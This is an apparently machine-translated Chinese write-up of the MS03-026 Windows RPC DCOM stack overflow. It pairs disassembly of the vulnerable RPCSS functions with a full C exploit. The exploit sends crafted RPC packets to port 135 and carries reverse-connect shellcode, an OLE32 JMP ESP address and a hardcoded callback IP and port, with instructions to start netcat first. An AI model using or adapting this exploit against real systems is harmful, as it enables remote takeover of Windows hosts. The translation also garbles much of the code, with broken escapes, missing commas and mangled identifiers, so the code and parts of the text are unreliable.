Attached
Analysis of LSD RPC Overflow Vulnerability
Pick, please indicate the author and security focus
Author: FLASHSKY
Author: Qi Mingxing Active Defense Laboratory
WWW site: www.venustech.com.cn www.xfocus.net, www.shopsky.com
Email: flashsky @ xfocus.org, fangxing @ venustech.com.cn, webmaster @ Shovesky.com
Thanks to Benjurry to do the generalization processing of testing, translation and code.
Email: Benjurry@xfocus.org
LSD RPC overflow vulnerabilities (MS03-26) have actually contain two overflow vulnerabilities, one is local, one is remote. They are all caused by a general interface.
The call to the problem is as follows:
HR = cogetinstanceFromfile (Pserveinfo, NULL, 0, CLSCTX_REMOTE_SERVER, STGM_REMOTE_SERVER, STGM_READWRITE, L "C: //123456111111111111111111111111.doc", 1, & qi);
This calling file name parameter (5th parameters can cause overflow), when this file name is too long, it will cause local overflow of the client (only given the 0x220 stack in the getPathforserver function in RPCSS, but is Copying with LSTRCPYW), this will not study here (but this API will check if the local file is existing, and therefore processed, so because this overflow can not be called directly to call this API, Instead, construct a function of the LPC directly after constructing the package information, interested in trying yourself.), Let's explain the remote overflow.
When the client passes this parameter to the server, it will be automatically converted to the remote server as the following format: l "// servername / c $ / 123456111111.doc" is passed to the remote server, so the servername will be taken first in the processing of the remote server. Name, but did not check it here, given 0x20 (default NetBIOS name) size space, so stack overflow generation:
The problem code is as follows:
GetPathforserver:
.TEXT: 761543DA PUSH EBP
.TEXT: 761543DB MOV EBP, ESP
.TEXT: 761543DD SUB ESP, 20H <----- 0x20 Space
.Text: 761543E0 MOV EAX, [EBP ARG_4]
.text: 761543E3 Push EBX
.text: 761543e4 Push ESI
.Text: 761543E5 MOV ESI, [EBP HMEM]
.text: 761543e8 Push EDI
.text: 761543e9 Push 5ch
.TEXT: 761543EB POP EBX
.TEXT: 761543EC MOV [EAX], ESI
.TEXT: 761543EE CMP [ESI], BX
.TEXT: 761543F1 MOV EDI, ESI
.TEXT: 761543F3 JNZ LOC_761544BF
.TEXT: 761543F9 CMP [ESI 2], BX
.TEXT: 761543FD JNZ LOC_761544BF
.Text: 76154403 Lea EAX, [EBP STRING1] "----------- Write address, only 0x20.Text: 76154406 PUSH 0
.text: 76154408 Push EAX
.Text: 76154409 Push ESI <--------------------- We are incorporated in the file name parameters
.TEXT: 7615440A Call getMachinename
. . . . . . . . . . . . . . . . . . . . . . . . . . When this function returns, the overflow point takes effect.
GetMachinename:
.Text: 7614DB6F MOV EAX, [EBP ARG_0]
.Text: 7614db72 MOV ECX, [EBP ARG_4]
.Text: 7614db75 Lea Edx, [EAX 4]
.Text: 7614dB78 MOV AX, [EAX 4]
.Text: 7614DB7C CMP AX, 5CH <---------------- only judge 0x5c
.TEXT: 7614DB80 JZ Short Loc_7614DB93
.TEXT: 7614DB82 SUB EDX, ECX
.TEXT: 7614DB84
.Text: 7614db84 Loc_7614db84:; code Xref: SUB_7614DA19 178J
.Text: 7614dB84 MOV [ECX], AX <---------------- Write only 0x20 space, more overflow
.TEXT: 7614DB87 INC ECX
.TEXT: 7614DB88 INC ECX
.TEXT: 7614DB89 MOV AX, [ECX EDX]
.TEXT: 7614DB8D CMP AX, 5CH
.TEXT: 7614DB91 JNZ Short Loc_7614DB84
.TEXT: 7614DB93
OK, we need ideas now to use this vulnerability, because / servername is automatically generated by the system, we can only use manual to directly generate RPC packages, and you cannot contain 0x5c in the shellcode, because this judgment is // ServerName it's over.
Let's give a code of implementation, pay attention to:
1. Due to rpcrt4, there is no JMP ESP code in RPCSS, where Ole32.dll is used, but this may be targeted, when you test
Need to be determined or find an existing JMP ESP, which is the address on Win2000 SP3 and OLE32 is not relocated.
2. Here, use the reverse connection shellcode, you need to run NC first
3. The overall length of the SC in the program must meet the relationship between SIZEOF (SZ)% 16 = 12, because the length of the entire package will have some fillers in the length of the whole package, then
Calculation does not satisfy a simple relationship I have given here, it will result in the resolution of the RPC package.
4. Before the overflow returns, the two parameters after the address will be used, so it is necessary to ensure that it is a memory to write space address.
5, here is the direct use of the stack overflow to return, in fact, everyone can try to cover SEH, here no more.
#include
#include
#include
#include
#include
#include
Unsigned char bindstr [] = {
0x05, 0x00, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};
Unsigned char request1 [] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xe8, 0x03
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x05, 0x00
0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0x24, 0x58, 0xfd, 0xcc, 0x45
0x64, 0x49, 0xB0, 0X70, 0X2C, 0xAe, 0x74, 0x2c, 0x96, 0x0d, 0x60, 0x5e, 0x0d, 0x00, 0x01,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x5e, 0x0d, 0x00, 0x02, 0x00, 0x00, 0x00, 0x7c, 0x5e
0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2a, 0x4d
0xCE, 0x11, 0xA6, 0x6a, 0x00, 0x20, 0xAF, 0x6e, 0x72, 0xF4, 0x0c, 0x00, 0x00, 0x00, 0x4d, 0x41
0x52, 0x42, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00
0x00, 0x00, 0xA8, 0xF4, 0x0b, 0x00, 0x60, 0x03, 0x00, 0x00, 0x60, 0x03, 0x00, 0x00, 0x4d, 0x45
0x4F, 0x57, 0x04, 0x00, 0x00, 0x00, 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x03, 0x00, 0x00, 0x28, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0xc8, 0x00
0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x28, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc4, 0x28, 0xcd, 0x00, 0x64, 0x29
, 0xcd, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x46, 0xAb, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAD, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0XAA, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x07, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x50, 0x00, 0x00, 0x00, 0x4f, 0xB6, 0x88, 0x20, 0xFF, 0xFF
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x00, 0x00, 0x00, 0x07, 0x00, 0x66, 0x00, 0x06, 0x09
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x10, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x78, 0x19, 0x0c, 0x00, 0x58, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00
0x00, 0x00, 0x70, 0xD8, 0x98, 0x93, 0x98, 0x4F, 0xD2, 0X11, 0XA9, 0X3D, 0XBE, 0X57, 0XB2, 0X00
0x00, 0x00, 0x32, 0x00, 0x31, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x80, 0x00, 0x00, 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00, 0x00 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x18, 0x43, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0xc0, 0x01
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x3b, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00
0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x81, 0xc5, 0x17, 0x03, 0x80, 0x0e
0x99, 0x4a, 0x99, 0x99, 0xf1, 0x8a, 0x50, 0x6f, 0x7a, 0x85, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x30, 0x00
0x00, 0x00, 0x78, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDa, 0x0d, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x2f, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x46, 0x00
0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x10, 0x00
0x00, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x68, 0x00
0x00, 0x00, 0x0e, 0x00, 0xff, 0xff, 0x68, 0x8b, 0x0b, 0x00, 0x02,0x00,0x00,0x00,0x00,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
UNSIGNED Char Request2 [] = {
0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00};
UNSIGNED Char Request3 [] = {
0x5c, 0x00
0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00
0x36, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x31, 0x00, 0x31, 0x00
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00
0x2e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x00, 0x00};
Unsigned char sc [] =
"/ x46 / x00 / x58 / x00 / x4e / x00 / x42 / x00 / x46 / x00 / x58 / x00"
"/ x46 / x00 / x00 / x42 / x00 / x46 / x00 / x58 / x00 / x46 / x00 / x58 / x00"
"/ x46 / x00 / x58 / x00"
"/ x46 / x00 / x58 / x00 / x25 / x2b / xaa / x77" // JMP ESP address IN OLE32.DLL, you may need to change yourself
"/ x38 / x6e / x16 / x76 / x0d / x6e / x16 / x76" // Need to be writable memory address
// below is shellcode, you can put your own shellcode, but you must ensure the overall length of the SC / 16 = 12, do not satisfy yourself to fill some 0x90
// shellcode does not exist 0x00, 0x00 and 0x5c
"/ XEB / X02 / XEB / X05 / XE8 / XF9 / XFF / XFF / XFF / X58 / X83 / XC0 / X1B / X8D / XA0 / X01"
"/ XFC / XFF / XFF / X83 / XE4 / XFC / X8B / XEC / X33 / XC9 / X66 / XB9 / X99 / X01 / X80 / X30"
"/ x93 / x40 / xe2 / xfa"
// Code
"/ X7B / XE4 / X93 / X93 / X93 / XD4 / XF6 / XE7 / XC3 / XE1 / XFC / XF0 / XD2 / XF7 / XF7 / XE1"
"/ XF6 / XE0 / XE0 / X93 / XDF / XFC / XF2 / XF7 / XDF / XFA / XF1 / XE1 / XE1 / XE1 / XEA / XD2"
"/ X93 / XD0 / XE1 / XF6 / XF2 / XE7 / XF6 / XC3 / XE1 / XFC / XF0 / XF6 / XE0 / XE0 / XD2 / X93"
"/ xd0 / xff / xfc / xe0 / xf6 / xdb / xf2 / xfd / xf7 / xff / xf6 / x93 / xd6 / xeb / xfa / xe7"
"/ XC7 / XFB / XE1 / XF6 / XF2 / XF7 / X93 / XE4 / XE0 / XA1 / XCC / XA0 / XA1 / X93 / XC4 / XC0"
"/ XD2 / XC0 / XE7 / XE6 / XE3 / X93 / XC4 / XC0 / XD2 / XC0 / XFC / XF0 / XF8"
"/ XF6 / XE7 / XD2 / X93 / XF0 / XFF / XFC / XE0 / XF6 / XE0 / XFC / XF0 / XF8 / XF6 / XE7 / X93"
"/ XF0 / XFC / XFD / XFD / XF6 / XF0 / XE7 / X93 / XF0 / XFE / XF7 / X93 / XC9 / XC1 / X28 / X93"
"/ x93 / x63 / xde / xc9 / x03 / x93 / x-x9 / x90 / xd8 / x78 / x66 / x18 / xe0"
"/ xaf / x90 / x60 / x18 / x90 / x18 / xed / xb3 / x90 / x68 / x18 / xdd / x87"
"/ XC5 / XA0 / X18 / XAC / X90 / X68 / X18 / X61 / XA0 / X5A / X22 / X9D / X60"
"/ X35 / XCA / XCC / XE7 / X9B / X10 / X54 / X97 / XD3 / X71 / X7B / X6C / X72 / XCD / X18 / XC5"
"/ xb7 / x90 / x40 / x51 / xa0 / x5a / xf5 / x18 / x9b / x18 / xd5 / x8f / x90" / x50 / x52 / x72 / x91 / x90 / x52 / x18 / X83 / X90 / X40 / XCD / X18 / X6D / XA0 / X5A / X22 "
"/ x97 / x93 / x93 / x10 / x55 / x98 / xc1 / xc5 / x6c / xc4 / x63 / xc9 / x18"
"/ X4B / XA0 / X5A / X22 / X97 / X7B / X14 / X93 / X93 / X93 / X10 / X55 / X9B / XC6 / XFB / X92"
"/ X92 / X93 / X93 / X6C / XC4 / X63 / X16 / X53 / XE6 / XE0 / XC3 / XC3 / XC3 / XC3 / XD3 / XC3"
"/ xd3 / xc3 / x6c / xc4 / x67 / x10 / x6b / x6c / xe7 / xf0 / x18 / x4b / xf5 / x54 / xd6 / x93"
"/ X91 / X93 / X91 / X28 / X39 / X54 / XD6 / X97 / X4E / X5F / X28 / X39 / XF9"
"/ X83 / XC6 / XC0 / X6C / XC4 / X6F / X16 / X53 / XE6 / XD0 / XA0 / X5A / X22 / X82 / XC4 / X18"
"/ x6e / x60 / x38 / xcc / x54 / xd6 / x93 / xd7 / x93 / x 293 / x93 / x1a / xce / xaf / x1a / XCE"
"/ XAb / X1A / XCE / XD3 / X54 / XD6 / XBF / X92 / X92 / X93 / X93 / X1E / XD6 / XD7 / XC3 / XC6"
"/ XC2 / XC2 / XC2 / XD2 / XC2 / XDA / XC2 / XC2 / XC5 / XC2 / X6C / XC4 / X77 / X6C / XE6 / XD7"
"/ X6C / XC4 / X7B / X6C / XE6 / XDB / X6C / XC4 / X7B / XC0 / X6C / XC4 / X6B / XC3 / X6C / XC4"
"/ X7F / X19 / X95 / XD5 / X17 / XC2 / XE6 / X6A / XC2 / XC1 / XC5 / XC0 / X6C / X41 / XC9 / XCA"
"/ x1a / x94 / xd4 / xd4 / xd4 / xd4 / x71 / x7a / x50 / x90 / x90"
"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
UNSIGNED Char Request4 [] = {
0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x00, 0x00
0x00, 0x00, 0x88, 0x2a, 0x0c, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x8c
0x0c, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
}
Void main (int Argc, char ** argv)
{
Wsadata wsadata;
Socket sock;
INT LEN, LEN1;
SockAddr_in addr_in;
Short port = 135;
UNSIGNED Char BUF1 [0x1000];
UNSIGNED Char BUF2 [0x1000];
UNSIGNED short port1;
DWORD CB;
IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)
{
Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());
Return;
}
Addr_in.sin_family = afd_inet; addr_in.sin_port = htons (port);
Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);
IF ((Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket
{
Printf ("socket failed.error:% d / n", wsagetlasterror ());
Return;
}
IF (WSaconnect (STRUCKADDR *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR)
{
Printf ("Connect Failed. Error:% D", Wsagetlasterror ());
Return;
}
Port1 = HTONS (2300); / / reverse connection port
Port1 ^ = 0x9393;
CB = 0xD20aa8c0; // reverse connection IP address, here is 192.168.10.210,
CB ^ = 0x93939393;
* (unsigned short *) & sc [330 0x30] = port1;
* (unsigned int *) & sc [335 0x30] = CB;
Len = SizeOf (SC);
Memcpy (BUF2, Request1, Sizeof (Request1));
Len1 = SIZEOF (Request1);
* (DWORD *) (Request2) = * (DWORD *) (Request2) SizeOf (SC) / 2; // Calculate file name double byte length
* (DWORD *) (Request2 8) = * (DWORD *) (Request2 8) SizeOf (SC) / 2; // Calculate file name double byte length
Memcpy (buf2 len1, request2, sizeof (request2));
LEN1 = LEN1 SIZEOF (Request2);
Memcpy (buf2 LEN1, SC, SIZEOF (SC));
LEN1 = LEN1 SIZEOF (SC);
Memcpy (BUF2 LEN1, Request3, Sizeof (Request3));
LEN1 = LEN1 SIZEOF (Request3);
Memcpy (BUF2 LEN1, Request4, Sizeof (Request4));
LEN1 = LEN1 SIZEOF (Request4);
* (DWORD *) (BUF2 8) = * (DWORD *) (BUF2 8) SIZEOF (SC) -0xc;
// Calculate the length of various structures
* (DWORD *) (BUF2 0x10) = * (DWORD *) (BUF2 0x10) SizeOf (SC) -0xc;
* (Dword *) (buf2 0x80) = * (dword *) (buf2 0x80) sizeof (sc) -0xc;
* (DWORD *) (BUF2 0x84) = * (DWORD *) (BUF2 0x84) SIZEOF (SC) -0xc;
* (DWORD *) (BUF2 0xB4) = * (DWORD *) (BUF2 0xB4) SIZEOF (SC) -0xc;
* (DWORD *) (BUF2 0xB8) = * (DWORD *) (BUF2 0xB8) SIZEOF (SC) -0xc; * (DWORD *) (BUF2 0xD0) = * (DWORD *) (BUF2 0xD0) SIZEOF (SC) -0XC;
* (DWORD *) (BUF2 0x18C) = * (DWORD *) (BUF2 0x18C) SIZEOF (SC) -0xc;
IF (SOND (SOCK, BINDSTR, SIZEOF (BINDSTR), 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
Len = Recv (SOCK, BUF1, 1000, NULL);
IF (SEND (SOCK, BUF2, LEN1, 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
Len = Recv (SOCK, BUF1, 1024, NULL);
}
Patch mechanism:
The patch makes the remote and local overflows, huh, this is so famous, I am too lazy.
Complement:
Due to the lack of more technical details, this is finally getting it from last Friday, but it is worthy of fortunately, it is worth finding the vulnerability of RPC DCOM DOS. I started to be confused by local overflow for a long time, how can I not remotely enter this function, and finally, let me look at it, when I call it, I think GetServerPath is a local overflowing getPathForserver function, heart For the distance to enter the getPathForserver function, carefully track, this is found to find the problem. Thanks all the comrades who care and guide my.
